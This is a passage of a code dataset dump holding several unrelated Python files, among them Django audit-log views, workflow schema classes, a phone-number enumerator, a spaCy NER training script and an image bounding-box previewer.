categories}\n\n @staticmethod\n def _get_request_params(validated_data: dict) -> dict:\n \"\"\"Get params from validated_data\"\"\"\n\n # 前端传的是零时区时间,需要统一成当前时区的时间\n target_start_time = make_aware(validated_data[\"start_time\"] + get_timezone_offset())\n target_end_time = make_aware(validated_data[\"end_time\"] + get_timezone_offset())\n\n params = {\n \"since\": target_start_time,\n \"until\": target_end_time,\n \"page\": validated_data[\"page\"],\n \"page_size\": validated_data[\"page_size\"],\n }\n return params\n\n\nclass GeneralLogViewSet(AuditLogViewSet):\n @inject_serializer(\n query_in=serializers.GeneralLogListReqeustSerializer,\n out=serializers.OperationLogRespSLZ,\n tags=[\"audit\"],\n )\n def list(self, request, validated_data: dict):\n categories = self._get_categories_map(request)\n api_instance = bkuser_sdk.AuditApi(self.get_api_client_by_request(request))\n\n params = self._get_request_params(validated_data)\n keyword = validated_data.get(\"keyword\")\n if keyword:\n for m in [OPERATION_OBJ_VALUE_MAP, OPERATION_VALUE_MAP]:\n keyword = m.get(keyword, keyword)\n\n params.update(\n {\n \"wildcard_search\": keyword.encode(\"unicode-escape\"),\n \"wildcard_search_fields\": [\"extra_value\", \"operator\"],\n }\n )\n\n return ResponseParams(\n api_instance.v2_audit_general_log_list(**params),\n {\"context\": {\"categories\": categories}},\n )\n\n\nclass LoginLogViewSet(AuditLogViewSet):\n @inject_serializer(\n query_in=serializers.LoginLogListReqeustSerializer,\n out=serializers.LoginLogRespSLZ,\n tags=[\"audit\"],\n )\n def list(self, request, validated_data: dict):\n categories = self._get_categories_map(request)\n api_instance = bkuser_sdk.AuditApi(self.get_api_client_by_request(request))\n\n params = self._get_request_params(validated_data)\n return ResponseParams(api_instance.v2_audit_login_log_list(**params), {\"context\": {\"categories\": categories}})\n\n 
@inject_serializer(query_in=serializers.LoginLogListReqeustSerializer, tags=[\"audit\"])\n def export(self, request, validated_data: dict):\n \"\"\"导出登录日志\"\"\"\n api_instance = bkuser_sdk.AuditApi(self.get_api_client_by_request(request))\n profile_api_instance = bkuser_sdk.ProfilesApi(self.get_api_client_by_request(request))\n fields_api_instance = bkuser_sdk.DynamicFieldsApi(self.get_api_client_by_request(request))\n\n params = self._get_request_params(validated_data)\n login_logs = self.get_paging_results(\n api_instance.v2_audit_login_log_list, since=params[\"since\"], until=params[\"until\"]\n )\n if not login_logs:\n raise error_codes.CANNOT_EXPORT_EMPTY_LOG\n\n fields = self.get_paging_results(fields_api_instance.v2_dynamic_fields_list)\n fields.append(\n bkuser_sdk.DynamicFields(name=\"create_time\", display_name=\"登录时间\", type=\"timer\", order=0).to_dict()\n )\n\n exporter = ProfileExcelExporter(\n load_workbook(settings.EXPORT_LOGIN_TEMPLATE), settings.EXPORT_EXCEL_FILENAME, fields, 1\n )\n\n # TODO: remove step when #88 is done\n step = 300\n profile_ids = list({x[\"profile_id\"] for x in login_logs})\n profiles = []\n counts = math.ceil(len(profile_ids) / step)\n for _c in range(counts):\n profiles.extend(\n self.get_paging_results(\n profile_api_instance.v2_profiles_list,\n lookup_field=\"id\",\n exact_lookups=profile_ids[_c * step : (_c + 1) * step],\n include_disabled=True,\n )\n )\n\n extra_info = {x[\"profile_id\"]: x for x in login_logs}\n exporter.update_profiles(profiles, extra_info)\n\n return exporter.to_response()\n","sub_path":"src/saas/bkuser_shell/audit/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"409576473","text":"\"\"\"\nA collection of schemas which represent elements of a property calculation workflow.\n\"\"\"\nimport re\n\nfrom propertyestimator.utils.quantities import EstimatedQuantity\nfrom propertyestimator.utils.serialization import TypedBaseModel\nfrom propertyestimator.workflow.plugins import available_protocols\nfrom propertyestimator.workflow.utils import ProtocolPath, ReplicatorValue\n\n\nclass ProtocolSchema(TypedBaseModel):\n \"\"\"A json serializable representation of a workflow protocol.\n \"\"\"\n\n def __init__(self):\n \"\"\"Constructs a new ProtocolSchema object.\n \"\"\"\n self.id = None\n self.type = None\n\n self.inputs = {}\n\n def __getstate__(self):\n\n return {\n 'id': self.id,\n 'type': self.type,\n\n 'inputs': self.inputs\n }\n\n def __setstate__(self, state):\n\n self.id = state['id']\n self.type = state['type']\n\n self.inputs = state['inputs']\n\n\nclass ProtocolGroupSchema(ProtocolSchema):\n \"\"\"A json serializable representation of a workflow protocol\n group.\n \"\"\"\n\n def __init__(self):\n \"\"\"Constructs a new ProtocolGroupSchema object.\n \"\"\"\n super().__init__()\n\n self.grouped_protocol_schemas = []\n\n def __getstate__(self):\n\n state = super(ProtocolGroupSchema, self).__getstate__()\n state.update({\n 'grouped_protocol_schemas': self.grouped_protocol_schemas,\n })\n\n return state\n\n def __setstate__(self, state):\n\n super(ProtocolGroupSchema, self).__setstate__(state)\n self.grouped_protocol_schemas = state['grouped_protocol_schemas']\n\n\nclass ProtocolReplicator(TypedBaseModel):\n \"\"\"A protocol replicator contains the information necessary to replicate\n parts of a property estimation workflow.\n\n The protocols referenced by `protocols_to_replicate` will be cloned for\n 
each value present in `template_values`. Protocols that are being replicated\n will also have any ReplicatorValue inputs replaced with the actual value.\n\n Each of the protocols referenced in the `protocols_to_replicate` must have an id\n which contains the '$(id_index)' string (e.g component_$(id_index)_build_coordinates)\n where here *`id` is the id of the replicator* - when the protocol is replicated, $(id_index)\n will be replaced by the protocols actual index, which corresponds to a value in the\n `template_values` array.\n\n Any protocols which take input from a replicated protocol will be updated to\n instead take a list of value, populated by the outputs of the replicated\n protocols.\n\n Notes\n -----\n * The protocols referenced to by `template_targets` **must not** be protocols\n which are being replicated.\n * The `template_values` property must be a list of either constant values,\n or :obj:`ProtocolPath`'s which take their value from the `global` scope.\n \"\"\"\n\n def __init__(self, replicator_id=''):\n \"\"\"Constructs a new ProtocolReplicator object.\n\n Parameters\n ----------\n replicator_id: str\n The id of this replicator.\n \"\"\"\n self.id = replicator_id\n\n self.protocols_to_replicate = []\n self.template_values = None\n\n def __getstate__(self):\n\n return {\n 'id': self.id,\n\n 'protocols_to_replicate': self.protocols_to_replicate,\n 'template_values': self.template_values\n }\n\n def __setstate__(self, state):\n\n self.id = state['id']\n\n self.protocols_to_replicate = state['protocols_to_replicate']\n self.template_values = state['template_values']\n\n def replicates_protocol_or_child(self, protocol_path):\n \"\"\"Returns whether the protocol pointed to by `protocol_path` (or\n any of its children) will be replicated by this replicator.\"\"\"\n\n for path_to_replace in self.protocols_to_replicate:\n\n if path_to_replace.full_path.find(protocol_path.start_protocol) < 0:\n continue\n\n return True\n\n return False\n\n\nclass WorkflowOutputToStore:\n \"\"\"An object which describes which data should be cached\n after a workflow has finished executing, and from which\n completed protocols should the data be collected from.\n \"\"\"\n\n def __init__(self):\n \"\"\"Constructs a new WorkflowOutputToStore object.\"\"\"\n\n self.substance = None\n\n self.trajectory_file_path = None\n self.coordinate_file_path = None\n\n self.statistics_file_path = None\n\n self.statistical_inefficiency = None\n\n def __getstate__(self):\n\n return_value = {\n 'substance': self.substance,\n 'trajectory_file_path': self.trajectory_file_path,\n 'coordinate_file_path': self.coordinate_file_path,\n 'statistics_file_path': self.statistics_file_path,\n 'statistical_inefficiency': self.statistical_inefficiency,\n }\n return return_value\n\n def __setstate__(self, state):\n\n self.substance = state['substance']\n self.trajectory_file_path = state['trajectory_file_path']\n self.coordinate_file_path = state['coordinate_file_path']\n self.statistics_file_path = state['statistics_file_path']\n self.statistical_inefficiency = state['statistical_inefficiency']\n\n\nclass WorkflowSchema(TypedBaseModel):\n \"\"\"Outlines the workflow which should be followed when calculating\n a certain property.\n \"\"\"\n\n def __init__(self,property_type=None):\n \"\"\"Constructs a new WorkflowSchema object.\n\n Parameters\n ----------\n property_type: str\n The type of property which this workflow aims to estimate.\n \"\"\"\n self.property_type = property_type\n self.id = None\n\n self.protocols = {}\n 
self.replicators = []\n\n self.final_value_source = None\n\n self.outputs_to_store = {}\n\n def __getstate__(self):\n\n return {\n 'property_type': self.property_type,\n 'id': self.id,\n\n 'protocols': self.protocols,\n 'replicators': self.replicators,\n\n 'final_value_source': self.final_value_source,\n\n 'outputs_to_store': self.outputs_to_store,\n }\n\n def __setstate__(self, state):\n\n self.property_type = state['property_type']\n self.id = state['id']\n\n self.protocols = state['protocols']\n self.replicators = state['replicators']\n\n self.final_value_source = state['final_value_source']\n\n self.outputs_to_store = state['outputs_to_store']\n\n def _validate_replicators(self):\n\n for replicator in self.replicators:\n\n assert replicator.id is not None and len(replicator.id) > 0\n\n if len(replicator.protocols_to_replicate) == 0:\n raise ValueError('A replicator does not have any protocols to replicate.')\n\n if (not isinstance(replicator.template_values, list) and\n not isinstance(replicator.template_values, ProtocolPath)):\n\n raise ValueError('The template values of a replicator must either be '\n 'a list of values, or a reference to a list of values.')\n\n if isinstance(replicator.template_values, list):\n\n for template_value in replicator.template_values:\n\n if not isinstance(template_value, ProtocolPath):\n continue\n\n if template_value.start_protocol not in self.protocols:\n raise ValueError('The value source {} does not exist.'.format(template_value))\n\n elif isinstance(replicator.template_values, ProtocolPath):\n\n if not replicator.template_values.is_global:\n raise ValueError('Template values must either be a constant, or come from the global '\n 'scope.')\n\n for protocol_path in replicator.protocols_to_replicate:\n\n if protocol_path.start_protocol not in self.protocols:\n raise ValueError('The value source {} does not exist.'.format(protocol_path))\n\n if protocol_path == self.final_value_source:\n\n raise ValueError('The final value source cannot come from'\n 'a protocol which is being replicated.')\n\n protocol_schema = self.protocols[protocol_path.start_protocol]\n\n if re.search(r'\\$\\(.*\\)', protocol_schema.id) is None:\n\n raise ValueError('Protocols which are being replicated must contain '\n 'the replicator id $(id) their protocol id.')\n\n def _validate_final_value(self):\n\n if self.final_value_source is None:\n raise ValueError('The final value source must not be None.')\n\n if self.final_value_source.start_protocol not in self.protocols:\n raise ValueError('The value source {} does not exist.'.format(self.final_value_source))\n\n protocol_schema = self.protocols[self.final_value_source.start_protocol]\n\n protocol_object = available_protocols[protocol_schema.type](protocol_schema.id)\n protocol_object.schema = protocol_schema\n\n protocol_object.get_value(self.final_value_source)\n\n attribute_type = protocol_object.get_attribute_type(self.final_value_source)\n assert issubclass(attribute_type, EstimatedQuantity)\n\n def _validate_outputs_to_store(self):\n \n attributes_to_check = [\n 'substance',\n 'trajectory_file_path',\n 'coordinate_file_path',\n 'statistics_file_path',\n 'statistical_inefficiency',\n ]\n\n for output_label in self.outputs_to_store:\n\n output_to_store = self.outputs_to_store[output_label]\n\n if not isinstance(output_to_store, WorkflowOutputToStore):\n\n raise ValueError('Only WorkflowOutputToStore objects are allowed '\n 'in the outputs_to_store dictionary at this time.')\n\n for attribute_name in attributes_to_check:\n\n 
attribute_value = getattr(output_to_store, attribute_name)\n\n if isinstance(attribute_value, ReplicatorValue):\n\n if len(self.replicators) == 0:\n\n raise ValueError('An output to store is trying to take its value from a '\n 'replicator, while this schema is no replicators.')\n\n elif len([replicator for replicator in self.replicators if\n attribute_value.replicator_id == replicator.id]) == 0:\n\n raise ValueError('An output to store is trying to take its value from a '\n 'replicator {} which does not exist.'.format(attribute_value.replicator_id))\n\n if not isinstance(attribute_value, ProtocolPath) or attribute_value.is_global:\n continue\n\n if attribute_value.start_protocol not in self.protocols:\n raise ValueError('The value source {} does not exist.'.format(attribute_value))\n\n protocol_schema = self.protocols[attribute_value.start_protocol]\n\n protocol_object = available_protocols[protocol_schema.type](protocol_schema.id)\n protocol_object.schema = protocol_schema\n\n protocol_object.get_value(attribute_value)\n\n def validate_interfaces(self):\n \"\"\"Validates the flow of the data between protocols, ensuring\n that inputs and outputs correctly match up.\n \"\"\"\n\n self._validate_final_value()\n self._validate_replicators()\n self._validate_outputs_to_store()\n\n for protocol_id in self.protocols:\n\n protocol_schema = self.protocols[protocol_id]\n\n protocol_object = available_protocols[protocol_schema.type](protocol_schema.id)\n protocol_object.schema = protocol_schema\n\n for input_path in protocol_object.required_inputs:\n\n input_value = protocol_object.get_value(input_path)\n\n if input_value is None:\n\n raise Exception('The {} required input of protocol {} in the {} schema was '\n 'not set.'.format(input_path, protocol_id, self.id))\n\n for input_path in protocol_object.required_inputs:\n\n value_references = protocol_object.get_value_references(input_path)\n\n for source_path, value_reference in value_references.items():\n\n if value_reference.is_global:\n # We handle global input validation separately\n continue\n\n # Make sure the other protocol whose output we are interested\n # in actually exists.\n if value_reference.start_protocol not in self.protocols:\n\n raise Exception('The {} protocol of the {} schema tries to take input from a non-existent '\n 'protocol: {}'.format(protocol_object.id, self.id,\n value_reference.start_protocol))\n\n other_protocol_schema = self.protocols[value_reference.start_protocol]\n\n other_protocol_object = available_protocols[other_protocol_schema.type](other_protocol_schema.id)\n other_protocol_object.schema = other_protocol_schema\n\n # Will throw the correct exception if missing.\n other_protocol_object.get_value(value_reference)\n\n expected_input_type = protocol_object.get_attribute_type(source_path)\n expected_output_type = other_protocol_object.get_attribute_type(value_reference)\n\n if (expected_input_type is not None and expected_output_type is not None and\n expected_input_type != expected_output_type):\n\n raise Exception('The output type ({}) of {} does not match the requested '\n 'input type ({}) of {}'.format(expected_output_type, value_reference,\n expected_input_type, source_path))\n","sub_path":"propertyestimator/workflow/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":14353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"132470955","text":"import re\nimport sys\n\ndef startProgram():\n sys.tracebacklimit = 0\n NPA = int(sys.argv[2])\n 
NXX = 200\n XXXX = 0000\n global phoneList\n global fileOption\n fileOption = sys.argv[1]\n if fileOption == 'file':\n phoneList = open(str(NPA)+'PhoneList', 'a+')\n numberCreation(NPA, NXX, XXXX)\n\ndef numberCreation(NPA, NXX, XXXX):\n while (NXX < 1000):\n number = str(NPA)+str(NXX)+str(XXXX).zfill(4)\n if fileOption == 'file':\n phoneList.write(number+'\\n')\n if fileOption == 'stream':\n print(number)\n\n XXXX += 1\n\n if XXXX == 10000:\n NXX += 1\n XXXX = 0000\n\n if re.match('[2-9][1][1]', str(NXX)) is not None:\n NXX += 1\n\n if NXX == 555 and XXXX == int ('0100'):\n XXXX = int('0200')\n\nstartProgram()\n\n# Wanted Changes\n# 1. Add Specific Area Code or All Area Code Options\n# 2. Fix Errors on Completion\n","sub_path":"numberGenerator.py","file_name":"numberGenerator.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"480841763","text":"import sys\nimport random\nimport os\nfrom pathlib import Path\nimport shutil\n\nimport argparse\nimport tqdm\nimport spacy\nfrom spacy.gold import minibatch\nfrom spacy.language import Language\nfrom spacy import util\n\n\nsys.path.insert(0, os.path.dirname(os.path.abspath(os.path.join(__file__, os.pardir))))\n\nfrom scispacy.data_util import read_full_med_mentions\nfrom scispacy.per_class_scorer import PerClassScorer\nfrom scispacy.umls_semantic_type_tree import construct_umls_tree_from_tsv\nfrom scispacy.train_utils import evaluate_ner\n\n\ndef train_ner(output_dir: str,\n data_path: str,\n run_test: bool = None,\n model: str = None,\n n_iter: int = 100,\n label_granularity: int = None):\n\n if label_granularity is not None:\n umls_tree = construct_umls_tree_from_tsv(\"https://s3-us-west-2.amazonaws.com/ai2-s2-scispacy/data/umls_semantic_type_tree.tsv\")\n label_mapping = umls_tree.get_collapsed_type_id_map_at_level(label_granularity)\n if label_granularity == 0:\n span_only = True\n else:\n label_mapping = None\n span_only = False\n train_data, dev_data, test_data = read_full_med_mentions(data_path, label_mapping, span_only)\n os.makedirs(output_dir, exist_ok=True)\n if run_test:\n nlp = spacy.load(model)\n print(\"Loaded model '%s'\" % model)\n evaluate_ner(nlp, dev_data, dump_path=os.path.join(output_dir, \"dev_metrics.json\"))\n evaluate_ner(nlp, test_data, dump_path=os.path.join(output_dir, \"test_metrics.json\"))\n else:\n train(model, train_data, dev_data, output_dir, n_iter)\n\n\ndef train(model, train_data, dev_data, output_dir, n_iter):\n \"\"\"Load the model, set up the pipeline and train the entity recognizer.\"\"\"\n if model is not None:\n nlp = spacy.load(model) # load existing spaCy model\n print(\"Loaded model '%s'\" % model)\n else:\n nlp = spacy.blank('en') # create blank Language class\n print(\"Created blank 'en' model\")\n\n # create the built-in pipeline components and add them to the pipeline\n # nlp.create_pipe works for built-ins that are registered with spaCy\n if 'ner' not in nlp.pipe_names and \"parser\" in nlp.pipe_names:\n ner = nlp.create_pipe('ner')\n nlp.add_pipe(ner, after=\"parser\")\n if 'ner' not in nlp.pipe_names and \"tagger\" in nlp.pipe_names:\n ner = nlp.create_pipe('ner')\n nlp.add_pipe(ner, after=\"tagger\")\n elif 'ner' not in nlp.pipe_names:\n ner = nlp.create_pipe('ner')\n nlp.add_pipe(ner, last=True)\n # otherwise, get it so we can add labels\n else:\n ner = nlp.get_pipe('ner')\n\n # add labels\n for _, annotations in train_data:\n for ent in annotations.get('entities'):\n ner.add_label(ent[2])\n\n # 
get names of other pipes to disable them during training\n other_pipes = [pipe for pipe in nlp.pipe_names if pipe != 'ner']\n\n dropout_rates = util.decaying(util.env_opt('dropout_from', 0.2),\n util.env_opt('dropout_to', 0.2),\n util.env_opt('dropout_decay', 0.005))\n batch_sizes = util.compounding(util.env_opt('batch_from', 1),\n util.env_opt('batch_to', 32),\n util.env_opt('batch_compound', 1.001))\n\n with nlp.disable_pipes(*other_pipes):\n optimizer = nlp.begin_training()\n\n best_epoch = 0\n best_f1 = 0\n for i in range(n_iter):\n\n random.shuffle(train_data)\n count = 0\n losses = {}\n total = len(train_data)\n\n with nlp.disable_pipes(*other_pipes): # only train NER\n with tqdm.tqdm(total=total, leave=True) as pbar:\n for batch in minibatch(train_data, size=batch_sizes):\n docs, golds = zip(*batch)\n nlp.update(docs, golds, sgd=optimizer,\n losses=losses, drop=next(dropout_rates))\n pbar.update(len(batch))\n if count % 100 == 0 and count > 0:\n print('sum loss: %s' % losses['ner'])\n count += 1\n\n # save model to output directory\n output_dir_path = Path(output_dir + \"/\" + str(i))\n if not output_dir_path.exists():\n output_dir_path.mkdir()\n\n with nlp.use_params(optimizer.averages):\n nlp.to_disk(output_dir_path)\n print(\"Saved model to\", output_dir_path)\n\n # test the saved model\n print(\"Loading from\", output_dir_path)\n nlp2 = util.load_model_from_path(output_dir_path)\n\n metrics = evaluate_ner(nlp2, dev_data)\n if metrics[\"f1-measure-untyped\"] > best_f1:\n best_f1 = metrics[\"f1-measure-untyped\"]\n best_epoch = i\n # save model to output directory\n best_model_path = Path(output_dir + \"/\" + \"best\")\n if os.path.exists(best_model_path):\n shutil.rmtree(best_model_path)\n shutil.copytree(os.path.join(output_dir, str(best_epoch)),\n best_model_path)\n\n # test the saved model\n print(\"Loading from\", best_model_path)\n nlp2 = util.load_model_from_path(best_model_path)\n\n evaluate_ner(nlp2, dev_data, dump_path=os.path.join(output_dir, \"metrics.json\"))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--model_output_dir',\n help=\"Path to the directory to output the trained models to\"\n )\n\n parser.add_argument(\n '--data_path',\n help=\"Path to the data directory.\"\n )\n\n parser.add_argument(\n '--run_test',\n help=\"Whether to run evaluation on the test dataset.\"\n )\n\n parser.add_argument(\n '--model_path',\n default=None,\n help=\"Path to the spacy model to load\"\n )\n parser.add_argument(\n '--iterations',\n type=int,\n help=\"Number of iterations to run.\"\n )\n parser.add_argument(\n '--label_granularity',\n type=int,\n help=\"granularity of the labels, between 1-7.\"\n )\n\n args = parser.parse_args()\n train_ner(args.model_output_dir,\n args.data_path,\n args.run_test,\n args.model_path,\n args.iterations,\n args.label_granularity)\n","sub_path":"scripts/train_ner.py","file_name":"train_ner.py","file_ext":"py","file_size_in_byte":6349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"38959959","text":"from copy import copy\n\nfrom ...config import ARConfig\nfrom ...config import config as cfg\nfrom ...utils.utils import SUB_SCRIPTS\n\n\nclass Alpha:\n \"\"\"\n An Alpha represents a pure element of the algebra without magnitude.\n It is composed of 0-4 Dimensions with the number of dimensions determining\n its nature: i.e. 
scalar, vector, bivector, trivector, quadrivector\n \"\"\"\n\n def __init__(self, index: str, sign: int = 1, cfg: ARConfig = cfg):\n if sign not in [1, -1]:\n raise ValueError(\"Invalid α sign: {}\".format(sign))\n\n if index.startswith(\"-\"):\n index = index[1:]\n sign *= -1\n\n if index not in cfg.allowed + cfg.allowed_groups:\n raise ValueError(\"Invalid α index: {}\".format(index))\n\n self._index = index\n self._sign = sign\n self.allowed = cfg.allowed\n self.allowed_groups = cfg.allowed_groups\n\n @property\n def sign(self):\n return self._sign\n\n def __repr__(self):\n neg = \"-\" if self._sign == -1 else \"\"\n try:\n return \"{}α{}\".format(neg, \"\".join(SUB_SCRIPTS[i] for i in self._index))\n except KeyError:\n return \"{}α{}\".format(neg, self._index)\n\n def __tex__(self):\n neg = \"-\" if self.sign == -1 else \"\"\n return neg + \"\\\\alpha_{\" + self._index + \"}\"\n\n def __eq__(self, other):\n if not isinstance(other, Alpha):\n return False\n\n return all([(self._index == other._index), (self._sign == other._sign)])\n\n def __lt__(self, other):\n try:\n allowed = self.allowed + self.allowed_groups\n return allowed.index(self._index) < allowed.index(other._index)\n except ValueError:\n raise TypeError(\n f\"Inconsistant config detected:\\n{self} -> {self.cfg}\\n{other} -> {other.cfg}\"\n )\n\n def __neg__(self):\n neg = copy(self)\n neg._sign *= -1\n return neg\n\n def __hash__(self):\n return hash((self._index, self._sign))\n","sub_path":"arpy/algebra/data_types/alpha.py","file_name":"alpha.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"362741712","text":"#\n# Copyright (C) 2020 Sellers Industry - All Rights Reserved\n# Unauthorized copying of this file, via any medium is strictly\n# prohibited. 
Proprietary and confidential.\n#\n# author: Evan Sellers \n# date: Sat Oct 16 2020\n# file: preview.py\n# project: Sythetic Dataset Generator\n# purpose: Will take the output data from the generator and draw\n# bounding boxes around each object\n#\n#\n\nimport os\nimport xml.etree.ElementTree as ET\nimport xmltodict, json\nfrom PIL import Image, ImageFont, ImageDraw, ImageEnhance\n\ndirectory = os.path.join( os.getcwd(), \"output\" )\nimages_dir = os.path.join( directory, \"images\" )\nannotations_dir = os.path.join( directory, \"annotations\" )\noutput_dir = os.path.join( directory, \"preview\" )\noutlineColor = \"red\"\n\nfor annotation in os.listdir( annotations_dir ):\n file = json.loads( json.dumps( xmltodict.parse( ET.tostring( ET.parse( os.path.join( annotations_dir, annotation ) ).getroot() ) ) ) )[ \"annotation\" ]\n\n bbox = []\n source_img = Image.open( os.path.join( images_dir, file[ \"filename\" ] ) ).convert(\"RGB\")\n\n if isinstance( file[ \"object\" ], list ):\n bbox = file[ \"object\" ]\n else:\n bbox.append( file[ \"object\" ] )\n\n for bounding in range( 0, len( bbox ) ):\n draw = ImageDraw.Draw(source_img)\n draw.rectangle( ( int( bbox[ bounding ][ \"bndbox\" ][ \"xmin\" ] ), int( bbox[ bounding ][ \"bndbox\" ][ \"ymin\" ] ), int( bbox[ bounding ][ \"bndbox\" ][ \"xmax\" ] ), int( bbox[ bounding ][ \"bndbox\" ][ \"ymax\" ] ) ), outline=outlineColor, width=max( int( source_img.size[ 0 ] / 500 ), 1 ) )\n draw.text((int( bbox[ bounding ][ \"bndbox\" ][ \"xmin\" ] ), int( bbox[ bounding ][ \"bndbox\" ][ \"ymin\" ] )), bbox[ bounding ][ \"name\" ] )\n\n draw.text( ( 0, 0 ), \"Aris Defense Project - Synthetic Image Generator (Sellers Industry 2020)\" )\n source_img.save( os.path.join( output_dir, file[ \"filename\" ] ) )","sub_path":"preview.py","file_name":"preview.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"408780925","text":"\"\"\"\r\nmiddle 2022-01-04 同向双指针|滑动窗口\r\n(与567字符串的排列+76最小覆盖子串+438找到字符串中所有字母异位词相似)\r\nhttps://leetcode-cn.com/problems/permutation-in-string/solution/zi-fu-chuan-de-pai-lie-hua-dong-chuang-k-sos8/\r\n思路:\r\nflag:记录窗口中满足条件的字符个数\r\n若一个字符进入窗口,应该增加 window 计数器;若一个字符将移出窗口,应该减少 window 计数器;\r\n当 flag 满足 tMap 时应收缩窗口;收缩窗口的时候应该更新最终结果。\r\n当发现某个字符在 window 中的数量满足了 tMap 的需要,就要更新 flag,表示有一个字符已满足要求。\r\n当 right - left + 1 == t.length()时,窗口大小 \"等于\" 字符串 t 的长度时移动 left 缩小窗口,\r\n因为各种排列的长度显然应该是一样的。\r\n-----------------------------------------------------------------------------------\r\n# 窗口中可以有其他字符,但是 windowMap 中只存放当前窗口中与要找的字符串 t 中字符相等字符的出现次数\r\n# S = \"EBBANCF\",当窗口下标为 [0, 5] 时,windowMap = {A:1, B:2, C:1}\r\n# T = \"ABC\",其中 tMap = {A:1, B:1, C:1}\r\n\"\"\"\r\nfrom collections import Counter\r\nclass Solution:\r\n # 同LC76模板\r\n # s1是短的, s2是长的\r\n def checkInclusion(self, s1, s2):\r\n n, m = len(s2), len(s1)\r\n # window 记录窗口中的字符;tMap 记录需要凑齐的字符(need)\r\n window_map = {}\r\n t_map = Counter(s1)\r\n\r\n right, left = 0, 0\r\n flag = 0 # 记录窗口中满足条件的字符个数\r\n\r\n while right < n:\r\n # 如果当前字符在t_map中\r\n if s2[right] in t_map:\r\n # 就将该字符加入到window中,只记录在tmap中的字符\r\n window_map[s2[right]] = window_map.get(s2[right],0)+1\r\n # 如果这个字符和t_map中一样了,说明有一个字符满足要求了\r\n if window_map.get(s2[right],0) == t_map.get(s2[right],0):\r\n flag += 1\r\n # 寻找最优解\r\n # 窗口大小 \"等于\" 字符串 t 的长度时移动 left 缩小窗口\r\n while right-left+1 == m:\r\n # 收缩窗口的时候更新最终结果\r\n if flag==len(t_map): return True\r\n\r\n # 字符移除窗口\r\n if s2[left] in t_map:\r\n # 移出left时,如果是tmap中的元素,flag--\r\n if window_map.get(s2[left],0) == 
t_map.get(s2[left],0):\r\n flag -= 1\r\n # 当前窗口移除元素\r\n window_map[s2[left]] = window_map.get(s2[left],0)-1\r\n # 缩小窗口\r\n left += 1\r\n # 扩大窗口\r\n right += 1\r\n return False\r\n\r\n def check_ori(self,s1,s2):\r\n lens1, lens2 = len(s1), len(s2)\r\n if not s1 or not s2 or lens1 > lens2: return False\r\n\r\n needmap = Counter(s1)\r\n need_cnt = len(needmap) # 有多少个字母需要满足, {字母:字母个数}\r\n windowmap = {}\r\n\r\n i = 0\r\n for j in range(lens2):\r\n if s2[j] in needmap:\r\n windowmap[s2[j]] = windowmap.get(s2[j], 0) + 1 # 当前窗口只记录需要的字符\r\n if needmap.get(s2[j],0)==windowmap.get(s2[j],0): # 有一个字符满足条件了\r\n need_cnt-=1\r\n\r\n # 寻找最优解\r\n while j-i+1 == lens1:\r\n if need_cnt == 0: return True\r\n\r\n # 【这里】破坏窗口性质\r\n if s2[i] in needmap:\r\n if windowmap.get(s2[i],0)==needmap.get(s2[i],0):\r\n need_cnt+=1\r\n windowmap[s2[i]] = windowmap.get(s2[i],0)-1\r\n i+=1\r\n\r\n return False\r\n\r\nif __name__ == '__main__':\r\n # s1 = \"ab\"\r\n # s2 = \"eidbaooo\"\r\n s1 = \"ABC\"\r\n s2 = \"EBBACF\"\r\n myResult = Solution()\r\n # 第一个字符串的排列之一是第二个字符串的子串\r\n print(myResult.checkInclusion(s1, s2))","sub_path":"02_双指针/567-字符串的排列.py","file_name":"567-字符串的排列.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"601807845","text":"import os, time, datetime, sys\nimport pandas as pd\n#import gtts, vlc\nfrom num_cipher import encrypt\nimport shutil, subprocess\n#f = Figlet(font='big')\n\n# List of letters that Monica can't hear\n\ndef gen_banana(cols):\n banana = r'''\n _\n //\\\n V \\\n \\ \\_\n \\,'.`-.\n |\\ `. `. \n ( \\ `. `-. _,.-:\\\n \\ \\ `. `-._ __..--' ,-';/\n \\ `. `-. `-..___..---' _.--' ,'/\n `. `. `-._ __..--' ,' /\n `. `-_ ``--..'' _.-' ,'\n `-_ `-.___ __,--' ,'\n `-.__ `----\"\"\" __.-'\n `--..____..--'\n '''\n\n lines = banana.splitlines()\n banana = padRight(lines)\n banana = padToCenter(banana, cols)\n\n return banana\n\ndef padRight(l:list)->list:\n maxLength = max(len(x) for x in l)\n return [ x.ljust(maxLength) for x in l]\n\ndef padToCenter(l:list,w:int)->str:\n \"\"\"Manual centering\"\"\"\n padding = ' '*(w//2) # a 1 char line would need at most w/2 spaces in front\n parts = [ padding[0: (w-len(p))//2+1]+p for p in l]\n return '\\n'.join(parts)\n\ndef padToCenter2(l:list,w:int)->str:\n return '\\n'.join('-'+x.center(w)+'-' for x in l)\n\ndef monify(user_text):\n\n\t'''\n\targs:\n\t\tuser_text: string that is inputted by user\n\t\tcant_hear: list of letters that cant be heard\n\n\tThis function turns the string into a list, iterates through the list \n\tand removes any character that monica cant hear and replaces it with a space\n\tthen joins the list and returns a string\n\t'''\n\tcant_hear = ['s','t','h','c','k','f','g','p',\n\t\t'S','T','H','C','K','F','G','P']\n\n\ttext_list = [i for i in user_text]\n\tnew_list = []\n\tfor i in text_list:\n\t\tif i in cant_hear:\n\t\t\tnew_list.append(' ')\n\t\telse:\n\t\t\tnew_list.append(i)\t\n\treturn \"\".join(new_list)\n\ndef get_time():\n\n\t'''\n\tFunction that just returns the datetime in a nice format for saving\n\t'''\n\n\tdate = str(datetime.datetime.now()).split(' ')[0]\n\ttime = '_'.join(str(datetime.datetime.now()).split(' 